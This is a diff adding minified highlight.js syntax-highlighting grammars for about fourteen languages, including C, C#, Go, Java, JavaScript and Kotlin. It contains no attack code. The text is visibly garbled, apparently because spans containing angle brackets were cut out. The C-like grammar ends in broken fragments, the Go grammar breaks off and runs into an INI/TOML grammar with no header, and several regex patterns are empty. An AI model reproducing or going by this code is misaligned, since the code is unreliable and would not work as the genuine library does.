+hljs.registerLanguage("c-like",function(){"use strict";return function(e){function t(e){return"(?:"+e+")?"}var n="(decltype\\(auto\\)|"+t("[a-zA-Z_]\\w*::")+"[a-zA-Z_]\\w*"+t("<.*?>")+")",r={className:"keyword",begin:"\\b[a-z\\d_]*_t\\b"},a={className:"string",variants:[{begin:'(u8?|U|L)?"',end:'"',illegal:"\\n",contains:[e.BACKSLASH_ESCAPE]},{begin:"(u8?|U|L)?'(\\\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4,8}|[0-7]{3}|\\S)|.)",end:"'",illegal:"."},e.END_SAME_AS_BEGIN({begin:/(?:u8?|U|L)?R"([^()\\ ]{0,16})\(/,end:/\)([^()\\ ]{0,16})"/})]},i={className:"number",variants:[{begin:"\\b(0b[01']+)"},{begin:"(-?)\\b([\\d']+(\\.[\\d']*)?|\\.[\\d']+)(u|U|l|L|ul|UL|f|F|b|B)"},{begin:"(-?)(\\b0[xX][a-fA-F0-9']+|(\\b[\\d']+(\\.[\\d']*)?|\\.[\\d']+)([eE][-+]?[\\d']+)?)"}],relevance:0},s={className:"meta",begin:/#\s*[a-z]+\b/,end:/$/,keywords:{"meta-keyword":"if else elif endif define undef warning error line pragma _Pragma ifdef ifndef include"},contains:[{begin:/\\\n/,relevance:0},e.inherit(a,{className:"meta-string"}),{className:"meta-string",begin:/<.*?>/,end:/$/,illegal:"\\n"},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},o={className:"title",begin:t("[a-zA-Z_]\\w*::")+e.IDENT_RE,relevance:0},c=t("[a-zA-Z_]\\w*::")+e.IDENT_RE+"\\s*\\(",l={keyword:"int float while private char char8_t char16_t char32_t catch import module export virtual operator sizeof dynamic_cast|10 typedef const_cast|10 const for static_cast|10 union namespace unsigned long volatile static protected bool template mutable if public friend do goto auto void enum else break extern using asm case typeid wchar_t short reinterpret_cast|10 default double register explicit signed typename try this switch continue inline delete alignas alignof constexpr consteval constinit decltype concept co_await co_return co_yield requires noexcept static_assert thread_local restrict final override atomic_bool atomic_char atomic_schar atomic_uchar atomic_short atomic_ushort atomic_int atomic_uint atomic_long atomic_ulong atomic_llong atomic_ullong new throw return and and_eq bitand bitor compl not not_eq or or_eq xor xor_eq",built_in:"std string wstring cin cout cerr clog stdin stdout stderr stringstream istringstream ostringstream auto_ptr deque list queue stack vector map set pair bitset multiset multimap unordered_set unordered_map unordered_multiset unordered_multimap priority_queue make_pair array shared_ptr abort terminate abs acos asin atan2 atan calloc ceil cosh cos exit exp fabs floor fmod fprintf fputs free frexp fscanf future isalnum isalpha iscntrl isdigit isgraph islower isprint ispunct isspace isupper isxdigit tolower toupper labs ldexp log10 log malloc realloc memchr memcmp memcpy memset modf pow printf putchar puts scanf sinh sin snprintf sprintf sqrt sscanf strcat strchr strcmp strcpy strcspn strlen strncat strncmp strncpy strpbrk strrchr strspn strstr tanh tan vfprintf vprintf vsprintf endl initializer_list unique_ptr _Bool complex _Complex imaginary _Imaginary",literal:"true false nullptr NULL"},d=[r,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,i,a],_={variants:[{begin:/=/,end:/;/},{begin:/\(/,end:/\)/},{beginKeywords:"new throw return else",end:/;/}],keywords:l,contains:d.concat([{begin:/\(/,end:/\)/,keywords:l,contains:d.concat(["self"]),relevance:0}]),relevance:0},u={className:"function",begin:"("+n+"[\\*&\\s]+)+"+c,returnBegin:!0,end:/[{;=]/,excludeEnd:!0,keywords:l,illegal:/[^\w\s\*&:<>]/,contains:[{begin:"decltype\\(auto\\)",keywords:l,relevance:0},{begin:c,returnBegin:!0,contains:[o],relevance:0},{className:"params",begin:/\(/,end:/\)/,keywords:l,relevance:0,contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,a,i,r,{begin:/\(/,end:/\)/,keywords:l,relevance:0,contains:["self",e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,a,i,r]}]},r,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,s]};return{aliases:["c","cc","h","c++","h++","hpp","hh","hxx","cxx"],keywords:l,disableAutodetect:!0,illegal:"",keywords:l,contains:["self",r]},{begin:e.IDENT_RE+"::",keywords:l},{className:"class",beginKeywords:"class struct",end:/[{;:]/,contains:[{begin://,contains:["self"]},e.TITLE_MODE]}]),exports:{preprocessor:s,strings:a,keywords:l}}}}());
+hljs.registerLanguage("c",function(){"use strict";return function(e){var n=e.getLanguage("c-like").rawDefinition();return n.name="C",n.aliases=["c","h"],n}}());
+hljs.registerLanguage("coffeescript",function(){"use strict";const e=["as","in","of","if","for","while","finally","var","new","function","do","return","void","else","break","catch","instanceof","with","throw","case","default","try","switch","continue","typeof","delete","let","yield","const","class","debugger","async","await","static","import","from","export","extends"],n=["true","false","null","undefined","NaN","Infinity"],a=[].concat(["setInterval","setTimeout","clearInterval","clearTimeout","require","exports","eval","isFinite","isNaN","parseFloat","parseInt","decodeURI","decodeURIComponent","encodeURI","encodeURIComponent","escape","unescape"],["arguments","this","super","console","window","document","localStorage","module","global"],["Intl","DataView","Number","Math","Date","String","RegExp","Object","Function","Boolean","Error","Symbol","Set","Map","WeakSet","WeakMap","Proxy","Reflect","JSON","Promise","Float64Array","Int16Array","Int32Array","Int8Array","Uint16Array","Uint32Array","Float32Array","Array","Uint8Array","Uint8ClampedArray","ArrayBuffer"],["EvalError","InternalError","RangeError","ReferenceError","SyntaxError","TypeError","URIError"]);return function(r){var t={keyword:e.concat(["then","unless","until","loop","by","when","and","or","is","isnt","not"]).filter((e=>n=>!e.includes(n))(["var","const","let","function","static"])).join(" "),literal:n.concat(["yes","no","on","off"]).join(" "),built_in:a.concat(["npm","print"]).join(" ")},i="[A-Za-z$_][0-9A-Za-z$_]*",s={className:"subst",begin:/#\{/,end:/}/,keywords:t},o=[r.BINARY_NUMBER_MODE,r.inherit(r.C_NUMBER_MODE,{starts:{end:"(\\s*/)?",relevance:0}}),{className:"string",variants:[{begin:/'''/,end:/'''/,contains:[r.BACKSLASH_ESCAPE]},{begin:/'/,end:/'/,contains:[r.BACKSLASH_ESCAPE]},{begin:/"""/,end:/"""/,contains:[r.BACKSLASH_ESCAPE,s]},{begin:/"/,end:/"/,contains:[r.BACKSLASH_ESCAPE,s]}]},{className:"regexp",variants:[{begin:"///",end:"///",contains:[s,r.HASH_COMMENT_MODE]},{begin:"//[gim]{0,3}(?=\\W)",relevance:0},{begin:/\/(?![ *]).*?(?![\\]).\/[gim]{0,3}(?=\W)/}]},{begin:"@"+i},{subLanguage:"javascript",excludeBegin:!0,excludeEnd:!0,variants:[{begin:"```",end:"```"},{begin:"`",end:"`"}]}];s.contains=o;var c=r.inherit(r.TITLE_MODE,{begin:i}),l={className:"params",begin:"\\([^\\(]",returnBegin:!0,contains:[{begin:/\(/,end:/\)/,keywords:t,contains:["self"].concat(o)}]};return{name:"CoffeeScript",aliases:["coffee","cson","iced"],keywords:t,illegal:/\/\*/,contains:o.concat([r.COMMENT("###","###"),r.HASH_COMMENT_MODE,{className:"function",begin:"^\\s*"+i+"\\s*=\\s*(\\(.*\\))?\\s*\\B[-=]>",end:"[-=]>",returnBegin:!0,contains:[c,l]},{begin:/[:\(,=]\s*/,relevance:0,contains:[{className:"function",begin:"(\\(.*\\))?\\s*\\B[-=]>",end:"[-=]>",returnBegin:!0,contains:[l]}]},{className:"class",beginKeywords:"class",end:"$",illegal:/[:="\[\]]/,contains:[{beginKeywords:"extends",endsWithParent:!0,illegal:/[:="\[\]]/,contains:[c]},c]},{begin:i+":",end:":",returnBegin:!0,returnEnd:!0,relevance:0}])}}}());
+hljs.registerLanguage("cpp",function(){"use strict";return function(e){var t=e.getLanguage("c-like").rawDefinition();return t.disableAutodetect=!1,t.name="C++",t.aliases=["cc","c++","h++","hpp","hh","hxx","cxx"],t}}());
+hljs.registerLanguage("csharp",function(){"use strict";return function(e){var n={keyword:"abstract as base bool break byte case catch char checked const continue decimal default delegate do double enum event explicit extern finally fixed float for foreach goto if implicit in int interface internal is lock long object operator out override params private protected public readonly ref sbyte sealed short sizeof stackalloc static string struct switch this try typeof uint ulong unchecked unsafe ushort using virtual void volatile while add alias ascending async await by descending dynamic equals from get global group into join let nameof on orderby partial remove select set value var when where yield",literal:"null false true"},i=e.inherit(e.TITLE_MODE,{begin:"[a-zA-Z](\\.?\\w)*"}),a={className:"number",variants:[{begin:"\\b(0b[01']+)"},{begin:"(-?)\\b([\\d']+(\\.[\\d']*)?|\\.[\\d']+)(u|U|l|L|ul|UL|f|F|b|B)"},{begin:"(-?)(\\b0[xX][a-fA-F0-9']+|(\\b[\\d']+(\\.[\\d']*)?|\\.[\\d']+)([eE][-+]?[\\d']+)?)"}],relevance:0},s={className:"string",begin:'@"',end:'"',contains:[{begin:'""'}]},t=e.inherit(s,{illegal:/\n/}),l={className:"subst",begin:"{",end:"}",keywords:n},r=e.inherit(l,{illegal:/\n/}),c={className:"string",begin:/\$"/,end:'"',illegal:/\n/,contains:[{begin:"{{"},{begin:"}}"},e.BACKSLASH_ESCAPE,r]},o={className:"string",begin:/\$@"/,end:'"',contains:[{begin:"{{"},{begin:"}}"},{begin:'""'},l]},g=e.inherit(o,{illegal:/\n/,contains:[{begin:"{{"},{begin:"}}"},{begin:'""'},r]});l.contains=[o,c,s,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,a,e.C_BLOCK_COMMENT_MODE],r.contains=[g,c,t,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,a,e.inherit(e.C_BLOCK_COMMENT_MODE,{illegal:/\n/})];var d={variants:[o,c,s,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE]},E={begin:"<",end:">",contains:[{beginKeywords:"in out"},i]},_=e.IDENT_RE+"(<"+e.IDENT_RE+"(\\s*,\\s*"+e.IDENT_RE+")*>)?(\\[\\])?",b={begin:"@"+e.IDENT_RE,relevance:0};return{name:"C#",aliases:["cs","c#"],keywords:n,illegal:/::/,contains:[e.COMMENT("///","$",{returnBegin:!0,contains:[{className:"doctag",variants:[{begin:"///",relevance:0},{begin:"\x3c!--|--\x3e"},{begin:""}]}]}),e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,{className:"meta",begin:"#",end:"$",keywords:{"meta-keyword":"if else elif endif define undef warning error line region endregion pragma checksum"}},d,a,{beginKeywords:"class interface",end:/[{;=]/,illegal:/[^\s:,]/,contains:[{beginKeywords:"where class"},i,E,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{beginKeywords:"namespace",end:/[{;=]/,illegal:/[^\s:]/,contains:[i,e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},{className:"meta",begin:"^\\s*\\[",excludeBegin:!0,end:"\\]",excludeEnd:!0,contains:[{className:"meta-string",begin:/"/,end:/"/}]},{beginKeywords:"new return throw await else",relevance:0},{className:"function",begin:"("+_+"\\s+)+"+e.IDENT_RE+"\\s*(\\<.+\\>)?\\s*\\(",returnBegin:!0,end:/\s*[{;=]/,excludeEnd:!0,keywords:n,contains:[{begin:e.IDENT_RE+"\\s*(\\<.+\\>)?\\s*\\(",returnBegin:!0,contains:[e.TITLE_MODE,E],relevance:0},{className:"params",begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:n,relevance:0,contains:[d,a,e.C_BLOCK_COMMENT_MODE]},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},b]}}}());
+hljs.registerLanguage("css",function(){"use strict";return function(e){var n={begin:/(?:[A-Z\_\.\-]+|--[a-zA-Z0-9_-]+)\s*:/,returnBegin:!0,end:";",endsWithParent:!0,contains:[{className:"attribute",begin:/\S/,end:":",excludeEnd:!0,starts:{endsWithParent:!0,excludeEnd:!0,contains:[{begin:/[\w-]+\(/,returnBegin:!0,contains:[{className:"built_in",begin:/[\w-]+/},{begin:/\(/,end:/\)/,contains:[e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,e.CSS_NUMBER_MODE]}]},e.CSS_NUMBER_MODE,e.QUOTE_STRING_MODE,e.APOS_STRING_MODE,e.C_BLOCK_COMMENT_MODE,{className:"number",begin:"#[0-9A-Fa-f]+"},{className:"meta",begin:"!important"}]}}]};return{name:"CSS",case_insensitive:!0,illegal:/[=\/|'\$]/,contains:[e.C_BLOCK_COMMENT_MODE,{className:"selector-id",begin:/#[A-Za-z0-9_-]+/},{className:"selector-class",begin:/\.[A-Za-z0-9_-]+/},{className:"selector-attr",begin:/\[/,end:/\]/,illegal:"$",contains:[e.APOS_STRING_MODE,e.QUOTE_STRING_MODE]},{className:"selector-pseudo",begin:/:(:)?[a-zA-Z0-9\_\-\+\(\)"'.]+/},{begin:"@(page|font-face)",lexemes:"@[a-z-]+",keywords:"@page @font-face"},{begin:"@",end:"[{;]",illegal:/:/,returnBegin:!0,contains:[{className:"keyword",begin:/@\-?\w[\w]*(\-\w+)*/},{begin:/\s/,endsWithParent:!0,excludeEnd:!0,relevance:0,keywords:"and or not only",contains:[{begin:/[a-z-]+:/,className:"attribute"},e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,e.CSS_NUMBER_MODE]}]},{className:"selector-tag",begin:"[a-zA-Z-][a-zA-Z0-9_-]*",relevance:0},{begin:"{",end:"}",illegal:/\S/,contains:[e.C_BLOCK_COMMENT_MODE,n]}]}}}());
+hljs.registerLanguage("diff",function(){"use strict";return function(e){return{name:"Diff",aliases:["patch"],contains:[{className:"meta",relevance:10,variants:[{begin:/^@@ +\-\d+,\d+ +\+\d+,\d+ +@@$/},{begin:/^\*\*\* +\d+,\d+ +\*\*\*\*$/},{begin:/^\-\-\- +\d+,\d+ +\-\-\-\-$/}]},{className:"comment",variants:[{begin:/Index: /,end:/$/},{begin:/={3,}/,end:/$/},{begin:/^\-{3}/,end:/$/},{begin:/^\*{3} /,end:/$/},{begin:/^\+{3}/,end:/$/},{begin:/^\*{15}$/}]},{className:"addition",begin:"^\\+",end:"$"},{className:"deletion",begin:"^\\-",end:"$"},{className:"addition",begin:"^\\!",end:"$"}]}}}());
+hljs.registerLanguage("go",function(){"use strict";return function(e){var n={keyword:"break default func interface select case map struct chan else goto package switch const fallthrough if range type continue for import return var go defer bool byte complex64 complex128 float32 float64 int8 int16 int32 int64 string uint8 uint16 uint32 uint64 int uint uintptr rune",literal:"true false iota nil",built_in:"append cap close complex copy imag len make new panic print println real recover delete"};return{name:"Go",aliases:["golang"],keywords:n,illegal:"e(n)).join("")}return function(a){var s={className:"number",relevance:0,variants:[{begin:/([\+\-]+)?[\d]+_[\d_]+/},{begin:a.NUMBER_RE}]},i=a.COMMENT();i.variants=[{begin:/;/,end:/$/},{begin:/#/,end:/$/}];var t={className:"variable",variants:[{begin:/\$[\w\d"][\w\d_]*/},{begin:/\$\{(.*?)}/}]},r={className:"literal",begin:/\bon|off|true|false|yes|no\b/},l={className:"string",contains:[a.BACKSLASH_ESCAPE],variants:[{begin:"'''",end:"'''",relevance:10},{begin:'"""',end:'"""',relevance:10},{begin:'"',end:'"'},{begin:"'",end:"'"}]},c={begin:/\[/,end:/\]/,contains:[i,r,t,l,s,"self"],relevance:0},g="("+[/[A-Za-z0-9_-]+/,/"(\\"|[^"])*"/,/'[^']*'/].map(n=>e(n)).join("|")+")";return{name:"TOML, also INI",aliases:["toml"],case_insensitive:!0,illegal:/\S/,contains:[i,{className:"section",begin:/\[+/,end:/\]+/},{begin:n(g,"(\\s*\\.\\s*",g,")*",n("(?=",/\s*=\s*[^#\s]/,")")),className:"attr",starts:{end:/$/,contains:[i,c,r,t,l,s]}}]}}}());
+hljs.registerLanguage("java",function(){"use strict";function e(e){return e?"string"==typeof e?e:e.source:null}function n(e){return a("(",e,")?")}function a(...n){return n.map(n=>e(n)).join("")}function s(...n){return"("+n.map(n=>e(n)).join("|")+")"}return function(e){var t="false synchronized int abstract float private char boolean var static null if const for true while long strictfp finally protected import native final void enum else break transient catch instanceof byte super volatile case assert short package default double public try this switch continue throws protected public private module requires exports do",i={className:"meta",begin:"@[À-ʸa-zA-Z_$][À-ʸa-zA-Z_$0-9]*",contains:[{begin:/\(/,end:/\)/,contains:["self"]}]},r=e=>a("[",e,"]+([",e,"_]*[",e,"]+)?"),c={className:"number",variants:[{begin:`\\b(0[bB]${r("01")})[lL]?`},{begin:`\\b(0${r("0-7")})[dDfFlL]?`},{begin:a(/\b0[xX]/,s(a(r("a-fA-F0-9"),/\./,r("a-fA-F0-9")),a(r("a-fA-F0-9"),/\.?/),a(/\./,r("a-fA-F0-9"))),/([pP][+-]?(\d+))?/,/[fFdDlL]?/)},{begin:a(/\b/,s(a(/\d*\./,r("\\d")),r("\\d")),/[eE][+-]?[\d]+[dDfF]?/)},{begin:a(/\b/,r(/\d/),n(/\.?/),n(r(/\d/)),/[dDfFlL]?/)}],relevance:0};return{name:"Java",aliases:["jsp"],keywords:t,illegal:/<\/|#/,contains:[e.COMMENT("/\\*\\*","\\*/",{relevance:0,contains:[{begin:/\w+@/,relevance:0},{className:"doctag",begin:"@[A-Za-z]+"}]}),e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,{className:"class",beginKeywords:"class interface",end:/[{;=]/,excludeEnd:!0,keywords:"class interface",illegal:/[:"\[\]]/,contains:[{beginKeywords:"extends implements"},e.UNDERSCORE_TITLE_MODE]},{beginKeywords:"new throw return else",relevance:0},{className:"function",begin:"([À-ʸa-zA-Z_$][À-ʸa-zA-Z_$0-9]*(<[À-ʸa-zA-Z_$][À-ʸa-zA-Z_$0-9]*(\\s*,\\s*[À-ʸa-zA-Z_$][À-ʸa-zA-Z_$0-9]*)*>)?\\s+)+"+e.UNDERSCORE_IDENT_RE+"\\s*\\(",returnBegin:!0,end:/[{;=]/,excludeEnd:!0,keywords:t,contains:[{begin:e.UNDERSCORE_IDENT_RE+"\\s*\\(",returnBegin:!0,relevance:0,contains:[e.UNDERSCORE_TITLE_MODE]},{className:"params",begin:/\(/,end:/\)/,keywords:t,relevance:0,contains:[i,e.APOS_STRING_MODE,e.QUOTE_STRING_MODE,e.C_NUMBER_MODE,e.C_BLOCK_COMMENT_MODE]},e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE]},c,i]}}}());
+hljs.registerLanguage("javascript",function(){"use strict";const e=["as","in","of","if","for","while","finally","var","new","function","do","return","void","else","break","catch","instanceof","with","throw","case","default","try","switch","continue","typeof","delete","let","yield","const","class","debugger","async","await","static","import","from","export","extends"],n=["true","false","null","undefined","NaN","Infinity"],a=[].concat(["setInterval","setTimeout","clearInterval","clearTimeout","require","exports","eval","isFinite","isNaN","parseFloat","parseInt","decodeURI","decodeURIComponent","encodeURI","encodeURIComponent","escape","unescape"],["arguments","this","super","console","window","document","localStorage","module","global"],["Intl","DataView","Number","Math","Date","String","RegExp","Object","Function","Boolean","Error","Symbol","Set","Map","WeakSet","WeakMap","Proxy","Reflect","JSON","Promise","Float64Array","Int16Array","Int32Array","Int8Array","Uint16Array","Uint32Array","Float32Array","Array","Uint8Array","Uint8ClampedArray","ArrayBuffer"],["EvalError","InternalError","RangeError","ReferenceError","SyntaxError","TypeError","URIError"]);function s(e){return r("(?=",e,")")}function r(...e){return e.map(e=>(function(e){return e?"string"==typeof e?e:e.source:null})(e)).join("")}return function(t){var i="[A-Za-z$_][0-9A-Za-z$_]*",c={begin:/<[A-Za-z0-9\\._:-]+/,end:/\/[A-Za-z0-9\\._:-]+>|\/>/},o={$pattern:"[A-Za-z$_][0-9A-Za-z$_]*",keyword:e.join(" "),literal:n.join(" "),built_in:a.join(" ")},l={className:"number",variants:[{begin:"\\b(0[bB][01]+)n?"},{begin:"\\b(0[oO][0-7]+)n?"},{begin:t.C_NUMBER_RE+"n?"}],relevance:0},E={className:"subst",begin:"\\$\\{",end:"\\}",keywords:o,contains:[]},d={begin:"html`",end:"",starts:{end:"`",returnEnd:!1,contains:[t.BACKSLASH_ESCAPE,E],subLanguage:"xml"}},g={begin:"css`",end:"",starts:{end:"`",returnEnd:!1,contains:[t.BACKSLASH_ESCAPE,E],subLanguage:"css"}},u={className:"string",begin:"`",end:"`",contains:[t.BACKSLASH_ESCAPE,E]};E.contains=[t.APOS_STRING_MODE,t.QUOTE_STRING_MODE,d,g,u,l,t.REGEXP_MODE];var b=E.contains.concat([{begin:/\(/,end:/\)/,contains:["self"].concat(E.contains,[t.C_BLOCK_COMMENT_MODE,t.C_LINE_COMMENT_MODE])},t.C_BLOCK_COMMENT_MODE,t.C_LINE_COMMENT_MODE]),_={className:"params",begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,contains:b};return{name:"JavaScript",aliases:["js","jsx","mjs","cjs"],keywords:o,contains:[t.SHEBANG({binary:"node",relevance:5}),{className:"meta",relevance:10,begin:/^\s*['"]use (strict|asm)['"]/},t.APOS_STRING_MODE,t.QUOTE_STRING_MODE,d,g,u,t.C_LINE_COMMENT_MODE,t.COMMENT("/\\*\\*","\\*/",{relevance:0,contains:[{className:"doctag",begin:"@[A-Za-z]+",contains:[{className:"type",begin:"\\{",end:"\\}",relevance:0},{className:"variable",begin:i+"(?=\\s*(-)|$)",endsParent:!0,relevance:0},{begin:/(?=[^\n])\s/,relevance:0}]}]}),t.C_BLOCK_COMMENT_MODE,l,{begin:r(/[{,\n]\s*/,s(r(/(((\/\/.*)|(\/\*(.|\n)*\*\/))\s*)*/,i+"\\s*:"))),relevance:0,contains:[{className:"attr",begin:i+s("\\s*:"),relevance:0}]},{begin:"("+t.RE_STARTERS_RE+"|\\b(case|return|throw)\\b)\\s*",keywords:"return throw case",contains:[t.C_LINE_COMMENT_MODE,t.C_BLOCK_COMMENT_MODE,t.REGEXP_MODE,{className:"function",begin:"(\\([^(]*(\\([^(]*(\\([^(]*\\))?\\))?\\)|"+t.UNDERSCORE_IDENT_RE+")\\s*=>",returnBegin:!0,end:"\\s*=>",contains:[{className:"params",variants:[{begin:t.UNDERSCORE_IDENT_RE},{className:null,begin:/\(\s*\)/,skip:!0},{begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:o,contains:b}]}]},{begin:/,/,relevance:0},{className:"",begin:/\s/,end:/\s*/,skip:!0},{variants:[{begin:"<>",end:""},{begin:c.begin,end:c.end}],subLanguage:"xml",contains:[{begin:c.begin,end:c.end,skip:!0,contains:["self"]}]}],relevance:0},{className:"function",beginKeywords:"function",end:/\{/,excludeEnd:!0,contains:[t.inherit(t.TITLE_MODE,{begin:i}),_],illegal:/\[|%/},{begin:/\$[(.]/},t.METHOD_GUARD,{className:"class",beginKeywords:"class",end:/[{;=]/,excludeEnd:!0,illegal:/[:"\[\]]/,contains:[{beginKeywords:"extends"},t.UNDERSCORE_TITLE_MODE]},{beginKeywords:"constructor",end:/\{/,excludeEnd:!0},{begin:"(get|set)\\s+(?="+i+"\\()",end:/{/,keywords:"get set",contains:[t.inherit(t.TITLE_MODE,{begin:i}),{begin:/\(\)/},_]}],illegal:/#(?!!)/}}}());
+hljs.registerLanguage("json",function(){"use strict";return function(n){var e={literal:"true false null"},i=[n.C_LINE_COMMENT_MODE,n.C_BLOCK_COMMENT_MODE],t=[n.QUOTE_STRING_MODE,n.C_NUMBER_MODE],a={end:",",endsWithParent:!0,excludeEnd:!0,contains:t,keywords:e},l={begin:"{",end:"}",contains:[{className:"attr",begin:/"/,end:/"/,contains:[n.BACKSLASH_ESCAPE],illegal:"\\n"},n.inherit(a,{begin:/:/})].concat(i),illegal:"\\S"},s={begin:"\\[",end:"\\]",contains:[n.inherit(a)],illegal:"\\S"};return t.push(l,s),i.forEach((function(n){t.push(n)})),{name:"JSON",contains:t,keywords:e,illegal:"\\S"}}}());
+hljs.registerLanguage("kotlin",function(){"use strict";return function(e){var n={keyword:"abstract as val var vararg get set class object open private protected public noinline crossinline dynamic final enum if else do while for when throw try catch finally import package is in fun override companion reified inline lateinit init interface annotation data sealed internal infix operator out by constructor super tailrec where const inner suspend typealias external expect actual trait volatile transient native default",built_in:"Byte Short Char Int Long Boolean Float Double Void Unit Nothing",literal:"true false null"},a={className:"symbol",begin:e.UNDERSCORE_IDENT_RE+"@"},i={className:"subst",begin:"\\${",end:"}",contains:[e.C_NUMBER_MODE]},s={className:"variable",begin:"\\$"+e.UNDERSCORE_IDENT_RE},t={className:"string",variants:[{begin:'"""',end:'"""(?=[^"])',contains:[s,i]},{begin:"'",end:"'",illegal:/\n/,contains:[e.BACKSLASH_ESCAPE]},{begin:'"',end:'"',illegal:/\n/,contains:[e.BACKSLASH_ESCAPE,s,i]}]};i.contains.push(t);var r={className:"meta",begin:"@(?:file|property|field|get|set|receiver|param|setparam|delegate)\\s*:(?:\\s*"+e.UNDERSCORE_IDENT_RE+")?"},l={className:"meta",begin:"@"+e.UNDERSCORE_IDENT_RE,contains:[{begin:/\(/,end:/\)/,contains:[e.inherit(t,{className:"meta-string"})]}]},c=e.COMMENT("/\\*","\\*/",{contains:[e.C_BLOCK_COMMENT_MODE]}),o={variants:[{className:"type",begin:e.UNDERSCORE_IDENT_RE},{begin:/\(/,end:/\)/,contains:[]}]},d=o;return d.variants[1].contains=[o],o.variants[1].contains=[d],{name:"Kotlin",aliases:["kt"],keywords:n,contains:[e.COMMENT("/\\*\\*","\\*/",{relevance:0,contains:[{className:"doctag",begin:"@[A-Za-z]+"}]}),e.C_LINE_COMMENT_MODE,c,{className:"keyword",begin:/\b(break|continue|return|this)\b/,starts:{contains:[{className:"symbol",begin:/@\w+/}]}},a,r,l,{className:"function",beginKeywords:"fun",end:"[(]|$",returnBegin:!0,excludeEnd:!0,keywords:n,illegal:/fun\s+(<.*>)?[^\s\(]+(\s+[^\s\(]+)\s*=/,relevance:5,contains:[{begin:e.UNDERSCORE_IDENT_RE+"\\s*\\(",returnBegin:!0,relevance:0,contains:[e.UNDERSCORE_TITLE_MODE]},{className:"type",begin://,keywords:"reified",relevance:0},{className:"params",begin:/\(/,end:/\)/,endsParent:!0,keywords:n,relevance:0,contains:[{begin:/:/,end:/[=,\/]/,endsWithParent:!0,contains:[o,e.C_LINE_COMMENT_MODE,c],relevance:0},e.C_LINE_COMMENT_MODE,c,r,l,t,e.C_NUMBER_MODE]},c]},{className:"class",beginKeywords:"class interface trait",end:/[:\{(]|$/,excludeEnd:!0,illegal:"extends implements",contains:[{beginKeywords:"public protected internal private constructor"},e.UNDERSCORE_TITLE_MODE,{className:"type",begin://,excludeBegin:!0,excludeEnd:!0,relevance:0},{className:"type",begin:/[,:]\s*/,end:/[<\(,]|$/,excludeBegin:!0,returnEnd:!0},r,l]},t,{className:"meta",begin:"^#!/usr/bin/env",end:"$",illegal:"\n"},{className:"number",begin:"\\b(0[bB]([01]+[01_]+[01]+|[01]+)|0[xX]([a-fA-F0-9]+[a-fA-F0-9_]+[a-fA-F0-9]+|[a-fA-F0-9]+)|(([\\d]+[\\d_]+[\\d]+|[\\d]+)(\\.([\\d]+[\\d_]+[\\d]+|[\\d]+))?|\\.([\\d]+[\\d_]+[\\d]+|[\\d]+))([eE][-+]?\\d+)?)[lLfF]?",relevance:0}]}}}());
+hljs.registerLanguage("less",function(){"use strict";return function(e){var n="([\\w-]+|@{[\\w-]+})",a=[],s=[],t=function(e){return{className:"string",begin:"~?"+e+".*?"+e}},r=function(e,n,a){return{className:e,begin:n,relevance:a}},i={begin:"\\(",end:"\\)",contains:s,relevance:0};s.push(e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,t("'"),t('"'),e.CSS_NUMBER_MODE,{begin:"(url|data-uri)\\(",starts:{className:"string",end:"[\\)\\n]",excludeEnd:!0}},r("number","#[0-9A-Fa-f]+\\b"),i,r("variable","@@?[\\w-]+",10),r("variable","@{[\\w-]+}"),r("built_in","~?`[^`]*?`"),{className:"attribute",begin:"[\\w-]+\\s*:",end:":",returnBegin:!0,excludeEnd:!0},{className:"meta",begin:"!important"});var c=s.concat({begin:"{",end:"}",contains:a}),l={beginKeywords:"when",endsWithParent:!0,contains:[{beginKeywords:"and not"}].concat(s)},o={begin:n+"\\s*:",returnBegin:!0,end:"[;}]",relevance:0,contains:[{className:"attribute",begin:n,end:":",excludeEnd:!0,starts:{endsWithParent:!0,illegal:"[<=$]",relevance:0,contains:s}}]},g={className:"keyword",begin:"@(import|media|charset|font-face|(-[a-z]+-)?keyframes|supports|document|namespace|page|viewport|host)\\b",starts:{end:"[;{}]",returnEnd:!0,contains:s,relevance:0}},d={className:"variable",variants:[{begin:"@[\\w-]+\\s*:",relevance:15},{begin:"@[\\w-]+"}],starts:{end:"[;}]",returnEnd:!0,contains:c}},b={variants:[{begin:"[\\.#:&\\[>]",end:"[;{}]"},{begin:n,end:"{"}],returnBegin:!0,returnEnd:!0,illegal:"[<='$\"]",relevance:0,contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,l,r("keyword","all\\b"),r("variable","@{[\\w-]+}"),r("selector-tag",n+"%?",0),r("selector-id","#"+n),r("selector-class","\\."+n,0),r("selector-tag","&",0),{className:"selector-attr",begin:"\\[",end:"\\]"},{className:"selector-pseudo",begin:/:(:)?[a-zA-Z0-9\_\-\+\(\)"'.]+/},{begin:"\\(",end:"\\)",contains:c},{begin:"!important"}]};return a.push(e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,g,d,o,b),{name:"Less",case_insensitive:!0,illegal:"[=>'/<($\"]",contains:a}}}());
